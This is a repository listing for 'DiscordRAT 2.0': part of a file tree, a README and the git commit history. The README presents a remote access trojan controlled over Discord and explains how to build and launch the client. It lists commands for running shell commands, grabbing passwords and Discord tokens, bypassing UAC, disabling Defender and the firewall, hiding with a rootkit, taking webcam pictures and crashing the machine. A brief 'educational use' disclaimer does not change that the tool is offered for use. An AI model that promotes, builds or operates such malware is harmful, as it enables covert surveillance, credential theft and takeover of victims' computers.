│   │   │       ├── InfBlocks.cs
│   │   │       ├── InfCodes.cs
│   │   │       ├── Inflate.cs
│   │   │       ├── InfTree.cs
│   │   │       ├── JZlib.cs
│   │   │       ├── StaticTree.cs
│   │   │       ├── Tree.cs
│   │   │       ├── ZInputStream.cs
│   │   │       ├── ZOutputStream.cs
│   │   │       └── ZStream.cs
│   │   └── x509
│   │       ├── AttributeCertificateHolder.cs
│   │       ├── AttributeCertificateIssuer.cs
│   │       ├── extension
│   │       │   ├── AuthorityKeyIdentifierStructure.cs
│   │       │   ├── SubjectKeyIdentifierStructure.cs
│   │       │   └── X509ExtensionUtil.cs
│   │       ├── IX509Extension.cs
│   │       ├── PEMParser.cs
│   │       ├── PrincipalUtil.cs
│   │       ├── store
│   │       │   ├── X509AttrCertStoreSelector.cs
│   │       │   ├── X509CertPairStoreSelector.cs
│   │       │   ├── X509CertStoreSelector.cs
│   │       │   └── X509CrlStoreSelector.cs
│   │       ├── SubjectPublicKeyInfoFactory.cs
│   │       ├── X509AttrCertParser.cs
│   │       ├── X509Attribute.cs
│   │       ├── X509Certificate.cs
│   │       ├── X509CertificatePair.cs
│   │       ├── X509CertificateParser.cs
│   │       ├── X509CertPairParser.cs
│   │       ├── X509Crl.cs
│   │       ├── X509CrlEntry.cs
│   │       ├── X509CrlParser.cs
│   │       ├── X509ExtensionBase.cs
│   │       ├── X509KeyUsage.cs
│   │       ├── X509SignatureUtil.cs
│   │       ├── X509Utilities.cs
│   │       ├── X509V1CertificateGenerator.cs
│   │       ├── X509V2AttributeCertificate.cs
│   │       ├── X509V2AttributeCertificateGenerator.cs
│   │       ├── X509V2CRLGenerator.cs
│   │       └── X509V3CertificateGenerator.cs
│   ├── Token grabber.csproj
│   └── Token grabber.csproj.user
└── Webcam
    ├── AForge
    │   ├── Video
    │   │   ├── IVideoSource.cs
    │   │   └── VideoEvents.cs
    │   └── Video.DirectShow
    │       ├── CameraControlProperty.cs
    │       ├── FilterInfoCollection.cs
    │       ├── FilterInfo.cs
    │       ├── Internals
    │       │   ├── IAMCameraControl.cs
    │       │   ├── IAMCrossbar.cs
    │       │   ├── IAMStreamConfig.cs
    │       │   ├── IAMVideoControl.cs
    │       │   ├── IBaseFilter.cs
    │       │   ├── ICaptureGraphBuilder2.cs
    │       │   ├── ICreateDevEnum.cs
    │       │   ├── IEnumFilters.cs
    │       │   ├── IEnumPins.cs
    │       │   ├── IFilterGraph2.cs
    │       │   ├── IFilterGraph.cs
    │       │   ├── IGraphBuilder.cs
    │       │   ├── IMediaControl.cs
    │       │   ├── IMediaEventEx.cs
    │       │   ├── IPin.cs
    │       │   ├── IPropertyBag.cs
    │       │   ├── IReferenceClock.cs
    │       │   ├── ISampleGrabberCB.cs
    │       │   ├── ISampleGrabber.cs
    │       │   ├── ISpecifyPropertyPages.cs
    │       │   ├── Structures.cs
    │       │   ├── Uuids.cs
    │       │   └── Win32.cs
    │       ├── PhysicalConnectorType.cs
    │       ├── Uuids.cs
    │       ├── VideoCapabilities.cs
    │       ├── VideoCaptureDevice.cs
    │       └── VideoInput.cs
    ├── Properties
    │   └── AssemblyInfo.cs
    ├── webcam.cs
    ├── Webcam.csproj
    └── Webcam.csproj.user

139 directories, 1947 files
======================: README CONTENT :======================
# DiscordRAT 2.0
Discord Remote Administration Tool fully written in c#.

This is a RAT controlled over Discord with over 40 post exploitation modules.

The output file size also around ~75kb!

## **Disclaimer:**

This tool is for educational use only, the author will not be held responsible for any misuse of this tool.

## **Credits**
The rootkit in the project was made by "bytecode77". The source of the rootkit can be found here: https://github.com/bytecode77/r77-rootkit

## **Setup Guide:**
Download the pre-complied binary's here https://github.com/moom825/Discord-RAT-2.0/releases/tag/2.0

You will first need to register a bot with the Discord developer portal and then add the bot to the Discord server that you want to use to control the bot (make sure the bot has administrator privileges in the Discord server).
Once the bot is created open "builder.exe" and paste the token in, and paste the guild ID of where you invited the bot

Then if the steps above were successful, you can launch the file by executing ```Client-built.exe```. It will create a new channel and post a message on the server with a generated session number.\
Now your bot should be available to use ! 

**Requirements:**\
Windows(x64)

## **Commands**
```
Available commands are :
--> !message = Show a message box displaying your text / Syntax  = "!message example"
--> !shell = Execute a shell command /Syntax  = "!shell whoami"
--> !voice = Make a voice say outloud a custom sentence / Syntax = "!voice test"
--> !admincheck = Check if program has admin privileges
--> !cd = Changes directory
--> !dir = display all items in current dir
--> !download = Download a file from infected computer
--> !upload = Upload file to the infected computer / Syntax = "!upload file.png" (with attachment)
--> !uploadlink = Upload file to the infected computer / Syntax = "!upload link file.png"
--> !delete = deletes a file / Syntax = "!delete / path to / the / file.txt"
--> !write = Type your desired sentence on computer
--> !wallpaper = Change infected computer wallpaper / Syntax = "!wallpaper" (with attachment)
--> !clipboard = Retrieve infected computer clipboard content
--> !idletime = Get the idle time of user's on target computer
--> !currentdir = display the current dir
--> !block = Blocks user's keyboard and mouse / Warning : Admin rights are required
--> !unblock = Unblocks user's keyboard and mouse / Warning : Admin rights are required
--> !screenshot = Get the screenshot of the user's current screen
--> !exit = Exit program
--> !kill = Kill a session or all sessions / Syntax = "!kill session-3" or "!kill all"
--> !uacbypass = attempt to bypass uac to gain admin by using windir and slui
--> !shutdown = shutdown computer
--> !restart = restart computer
--> !logoff = log off current user
--> !bluescreen = BlueScreen PC
--> !datetime = display system date and time
--> !prockill = kill a process by name / syntax = "!kill process"
--> !disabledefender = Disable windows defender(requires admin)
--> !disablefirewall = Disable windows firewall(requires admin)
--> !audio = play a audio file on the target computer / Syntax = "!audio" (with attachment)
--> !critproc = make program a critical process. meaning if its closed the computer will bluescreen(Admin rights are required)
--> !uncritproc = if the process is a critical process it will no longer be a critical process meaning it can be closed without bluescreening(Admin rights are required)
--> !website = open a website on the infected computer / syntax = "!website www.google.com"
--> !disabletaskmgr = disable task manager(Admin rights are required)
--> !enabletaskmgr = enable task manager(if disabled)(Admin rights are required)
--> !startup = add to startup(when computer go on this file starts)
--> !geolocate = Geolocate computer using latitude and longitude of the ip adress with google map / Warning : Geolocating IP adresses is not very precise
--> !listprocess = Get all process's
--> !password = grab all passwords
--> !rootkit = Launch a rootkit (the process will be hidden from taskmgr and you wont be able to see the file)(Admin rights are required)
--> !unrootkit = Remove the rootkit(Admin rights are required)
--> !getcams = Grab the cameras names and their respected selection number
--> !selectcam = Select camera to take a picture out of (default will be camera 1)/ Syntax "!selectcam 1"
--> !webcampic = Take a picture out of the selected webcam
--> !grabtokens = Grab all discord tokens on the current pc
--> !help = This help menu
```

## **Contact:**
Feel free to contact me if you have any problems.
if you want something added feel free to ask by joining by discord server.\
https://discord.gg/cKwkkC2U4c.
====================== GIT HISTORY: ======================
4ec85ba HEAD@{0}: clone: from https://github.com/moom825/Discord-RAT-2.0
commit 4ec85babdfcdb19442e6ac8feae5075e041d6b78
Author: moom825 <63253634+moom825@users.noreply.github.com>
Date:   Sun Nov 20 18:50:01 2022 -0500

    Update README.md

commit be55762b46ebfa04a139b3eedb44e4b7386bad0f
Author: moom825 <63253634+moom825@users.noreply.github.com>
Date:   Tue Aug 16 15:20:00 2022 -0400

    Update README.md

commit 281d9bbe7f598f31b4c5799452a2ab6d3627ddc8
Author: moom825 <63253634+moom825@users.noreply.github.com>
Date:   Mon Aug 8 22:51:38 2022 -0400

    Forgot to update the commands

commit 4351b2a40ef84c64d191e0852de64b8507435144
Author: moom825 <63253634+moom825@users.noreply.github.com>
Date:   Wed Aug 3 17:00:14 2022 -0400

    Update README.md

commit c6385aebc330b75d509c535a7764b4922bcbcce3
Author: moom825 <63253634+moom825@users.noreply.github.com>
Date:   Wed Aug 3 16:28:12 2022 -0400

    branch change from main to master

commit a20cb245ade88a0e02516a951281c1f9e1a2ede3
Author: moom825 <63253634+moom825@users.noreply.github.com>
Date:   Wed Aug 3 16:20:51 2022 -0400

    Add files via upload

commit 008ffecbf9457461c523652c76dd47f16cc2d0d9
Author: moom825 <maximusckaz@gmail.com>
Date:   Wed Aug 3 16:06:43 2022 -0400

    adding webcam and token features and fixing some problems with the uacbypass
